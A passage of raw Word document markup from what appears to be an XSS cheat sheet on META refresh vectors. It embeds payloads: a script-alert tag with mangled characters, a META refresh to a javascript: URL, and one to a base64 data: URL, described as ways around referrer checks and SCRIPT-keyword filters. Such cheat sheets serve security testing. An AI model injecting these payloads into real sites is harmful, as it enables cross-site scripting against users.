                            <a:ext cx="2516" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4108 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2516"/>
                              <a:gd name="T2" fmla="+- 0 364 181"/>
                              <a:gd name="T3" fmla="*/ 364 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2516"/>
                              <a:gd name="T6" fmla="+- 0 364 181"/>
                              <a:gd name="T7" fmla="*/ 364 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2516"/>
                              <a:gd name="T10" fmla="+- 0 363 181"/>
                              <a:gd name="T11" fmla="*/ 363 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2516"/>
                              <a:gd name="T14" fmla="+- 0 343 181"/>
                              <a:gd name="T15" fmla="*/ 343 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2516"/>
                              <a:gd name="T18" fmla="+- 0 339 181"/>
                              <a:gd name="T19" fmla="*/ 339 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2516"/>
                              <a:gd name="T22" fmla="+- 0 203 181"/>
                              <a:gd name="T23" fmla="*/ 203 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2516"/>
                              <a:gd name="T26" fmla="+- 0 181 181"/>
                              <a:gd name="T27" fmla="*/ 181 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4108 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2516"/>
                              <a:gd name="T30" fmla="+- 0 181 181"/>
                              <a:gd name="T31" fmla="*/ 181 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4129 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2516"/>
                              <a:gd name="T34" fmla="+- 0 203 181"/>
                              <a:gd name="T35" fmla="*/ 203 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4129 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2516"/>
                              <a:gd name="T38" fmla="+- 0 343 181"/>
                              <a:gd name="T39" fmla="*/ 343 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4111 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2516"/>
                              <a:gd name="T42" fmla="+- 0 363 181"/>
                              <a:gd name="T43" fmla="*/ 363 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4108 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2516"/>
                              <a:gd name="T46" fmla="+- 0 364 181"/>
                              <a:gd name="T47" fmla="*/ 36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16" h="183">
                                <a:moveTo>
                                  <a:pt x="2494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2494" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2515" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2515" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2497" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2494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Text Box 76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81"/>
                            <a:ext cx="251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 w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>¼script¾alert(¢XSS¢)¼/script¾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2" o:spid="_x0000_s1668" style="position:absolute;margin-left:80.7pt;margin-top:9.05pt;width:125.8pt;height:9.15pt;z-index:-15614976;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,181" coordsize="251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">
                <v:shape id="Freeform 764" o:spid="_x0000_s1669" style="position:absolute;left:1614;top:181;width:2516;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="251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sjZcIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5pVwcpqFBW39lpb8PrYPLOL&#10;m5clie767xtB6HGYmW+Y1aa3jbiTD7VjBZNxBoK4dLpmo+D3p3hfgAgRWWPjmBQ8KMBmPXhbYa5d&#10;x990P0UjEoRDjgqqGNtcylBWZDGMXUucvIvzFmOS3kjtsUtw28hpls2lxZrTQoUt7Ssqr6ebVVAU&#10;znzuTP/oZkezKLaHo7+eWanRsN8uQUTq43/41f7SCj7mU3ieSU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OyNlwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m2494,183l21,183r-3,-1l,162r,-4l,22,21,,2494,r21,22l2515,162r-18,20l2494,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2494,364;21,364;18,363;0,343;0,339;0,203;21,181;2494,181;2515,203;2515,343;2497,363;2494,364" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 763" o:spid="_x0000_s1670" type="#_x0000_t202" style="position:absolute;left:1614;top:181;width:251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jowMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTC6mNriLSQqFQTOKhx2f2&#10;mSxm38bsVtN/3xUKHoeZ+YZZrgfbigv13jhW8DRNQBBXThuuFezL98kchA/IGlvHpOCXPKxX49ES&#10;M+2unNOlCLWIEPYZKmhC6DIpfdWQRT91HXH0jq63GKLsa6l7vEa4beUsSVJp0XBcaLCjbUPVqfix&#10;CjbfnL+Z89dhlx9zU5avCX+mJ6UeH4bNAkSgIdzD/+0PreAlfYb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mOjA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 w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>¼script¾alert(¢XSS¢)¼/script¾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rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>META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19" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>odd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>thing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>refresh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doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>send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referrer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header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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attacks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rid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referring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URLs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="12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0201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120015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3688080" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="758" name="Group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8080" cy="116205"/>
                          <a:chOff x="1614" y="189"/>
                          <a:chExt cx="5808" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="759" name="Freeform 761"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="188"/>
                            <a:ext cx="5808" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7401 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5808"/>
                              <a:gd name="T2" fmla="+- 0 371 189"/>
                              <a:gd name="T3" fmla="*/ 371 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5808"/>
                              <a:gd name="T6" fmla="+- 0 371 189"/>
                              <a:gd name="T7" fmla="*/ 371 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5808"/>
                              <a:gd name="T10" fmla="+- 0 370 189"/>
                              <a:gd name="T11" fmla="*/ 370 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5808"/>
                              <a:gd name="T14" fmla="+- 0 350 189"/>
                              <a:gd name="T15" fmla="*/ 350 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5808"/>
                              <a:gd name="T18" fmla="+- 0 347 189"/>
                              <a:gd name="T19" fmla="*/ 347 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5808"/>
                              <a:gd name="T22" fmla="+- 0 210 189"/>
                              <a:gd name="T23" fmla="*/ 210 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5808"/>
                              <a:gd name="T26" fmla="+- 0 189 189"/>
                              <a:gd name="T27" fmla="*/ 189 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7401 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5808"/>
                              <a:gd name="T30" fmla="+- 0 189 189"/>
                              <a:gd name="T31" fmla="*/ 189 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7422 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5808"/>
                              <a:gd name="T34" fmla="+- 0 210 189"/>
                              <a:gd name="T35" fmla="*/ 210 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7422 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5808"/>
                              <a:gd name="T38" fmla="+- 0 350 189"/>
                              <a:gd name="T39" fmla="*/ 350 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7404 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5808"/>
                              <a:gd name="T42" fmla="+- 0 370 189"/>
                              <a:gd name="T43" fmla="*/ 370 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7401 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5808"/>
                              <a:gd name="T46" fmla="+- 0 371 189"/>
                              <a:gd name="T47" fmla="*/ 37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808" h="183">
                                <a:moveTo>
                                  <a:pt x="5787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787" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5808" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5808" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5790" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="578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Text Box 760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88"/>
                            <a:ext cx="580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&lt;META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HTTP-EQUIV="refresh"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0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CONTENT="0;url=javascript:alert('XSS');"&gt;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9" o:spid="_x0000_s1671" style="position:absolute;margin-left:80.7pt;margin-top:9.45pt;width:290.4pt;height:9.15pt;z-index:-15614464;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,189" coordsize="5808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">
                <v:shape id="Freeform 761" o:spid="_x0000_s1672" style="position:absolute;left:1614;top:188;width:5808;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="580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4wvMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wXfYTlC7+pGoalGVwn2By8sNDEPcMge&#10;k2D2bMhuNX17VxC8HGbmG2a9HUwrLtS7xrKC2TQCQVxa3XCloDh+vS5AOI+ssbVMCv7JwXYzHq0x&#10;0fbKGV1yX4kAYZeggtr7LpHSlTUZdFPbEQfvZHuDPsi+krrHa4CbVs6jKJYGGw4LNXa0q6k8539G&#10;gd/HqeOPVH9n6e+hzOPi5/hZKPUyGdIVCE+Df4Yf7b1W8P62hPuZc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eMLzEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m5787,182l21,182r-3,-1l,161r,-3l,21,21,,5787,r21,21l5808,161r-18,20l5787,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5787,371;21,371;18,370;0,350;0,347;0,210;21,189;5787,189;5808,210;5808,350;5790,370;5787,371" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 760" o:spid="_x0000_s1673" type="#_x0000_t202" style="position:absolute;left:1614;top:188;width:5808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p2t8IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/4P4Q1203QeutmZioiCMBir9eDxrXlt&#10;g81LbaJ2//1yGOz48f1erUfbiTsN3jhW8DJPQBBXThtuFJzK/ewNhA/IGjvHpOCHPKzz6WSFmXYP&#10;Luh+DI2IIewzVNCG0GdS+qoli37ueuLI1W6wGCIcGqkHfMRw28lFkqTSouHY0GJP25aqy/FmFWzO&#10;XOzM9fP7q6gLU5bLhD/Si1LPT+PmHUSgMfyL/9wHreA1jfPjmX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Sna3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&lt;META</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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HTTP-EQUIV="refresh"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="80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CONTENT="0;url=javascript:alert('XSS');"&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>META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Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="328" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="255"/>
      </w:pPr>
      <w:r>
        <w:t>Directive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scheme.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nice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>visibly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word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SCRIPT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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive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it,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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utilizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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RFC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>2397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details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go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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own.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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>calculator</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="6"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:rPr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just</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>want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encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTML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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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0252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107315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="755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614" y="169"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="756" name="Freeform 758"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="169"/>
                            <a:ext cx="997" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2590 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 997"/>
                              <a:gd name="T2" fmla="+- 0 351 169"/>
                              <a:gd name="T3" fmla="*/ 351 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 351 169"/>
                              <a:gd name="T7" fmla="*/ 351 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 351 169"/>
                              <a:gd name="T11" fmla="*/ 351 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 330 169"/>
                              <a:gd name="T15" fmla="*/ 330 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 327 169"/>
                              <a:gd name="T19" fmla="*/ 327 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 190 169"/>
                              <a:gd name="T23" fmla="*/ 190 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 169 169"/>
                              <a:gd name="T27" fmla="*/ 169 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2590 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 169 169"/>
                              <a:gd name="T31" fmla="*/ 169 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2611 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 190 169"/>
                              <a:gd name="T35" fmla="*/ 190 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2611 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 330 169"/>
                              <a:gd name="T39" fmla="*/ 330 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2593 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 351 169"/>
                              <a:gd name="T43" fmla="*/ 351 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2590 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 351 169"/>
                              <a:gd name="T47" fmla="*/ 35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Text Box 75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9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&lt;META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4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HTTP-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6" o:spid="_x0000_s1674" style="position:absolute;margin-left:80.7pt;margin-top:8.45pt;width:49.85pt;height:9.15pt;z-index:-15613952;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,169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">
                <v:shape id="Freeform 758" o:spid="_x0000_s1675" style="position:absolute;left:1614;top:169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b/uMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE7wW/w/KEXoputNTWmFVEKfRQhcZ6f2Zf&#10;/mD2bcxuNP323ULB4zAzv2GSVW9qcaXWVZYVTMYRCOLM6ooLBd+H99EbCOeRNdaWScEPOVgtBw8J&#10;xtre+IuuqS9EgLCLUUHpfRNL6bKSDLqxbYiDl9vWoA+yLaRu8RbgppbTKJpJgxWHhRIb2pSUndPO&#10;KNhd5nK7rc/rp/1n3rnudDw964lSj8N+vQDhqff38H/7Qyt4fZnB3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b/uMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,351;21,351;18,351;0,330;0,327;0,190;21,169;976,169;997,190;997,330;979,351;976,351" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 757" o:spid="_x0000_s1676" type="#_x0000_t202" style="position:absolute;left:1614;top:169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8kfsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNVNC/5p6kakKAhCaUwPPb5m&#10;n8mS7NuYXTV+e7dQ8DjMzG+YxXKwrThT741jBS/jBARx6bThSsF3sXmeg/ABWWPrmBRcycMye3xY&#10;YKrdhXM670MlIoR9igrqELpUSl/WZNGPXUccvYPrLYYo+0rqHi8Rblv5miRTadFwXKixo4+aymZ/&#10;sgpWP5yvzfHz9ys/5KYo3hLeTRulRk/D6h1EoCHcw//trVYwm8zg70w8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8kfs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&lt;META</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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HTTP-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8"/>
        <w:rPr>
          <w:sz w:val="4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5130800" cy="116205"/>
                <wp:effectExtent l="5715" t="8255" r="6985" b="0"/>
                <wp:docPr id="752" name="Group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0800" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8080" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="753" name="Freeform 7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080" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8059 w 8080"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8080"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8080"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8080"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8080"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8080"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8080"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8059 w 8080"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8080 w 8080"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8080 w 8080"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8062 w 8080"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8059 w 8080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080" h="183">
                                <a:moveTo>
                                  <a:pt x="805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9" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8080" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8080" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8062" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="805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Text Box 75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08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EQUIV="refresh"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CONTENT="0;url=data:text/html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1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base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;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53" o:spid="_x0000_s1677" style="width:404pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="808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">
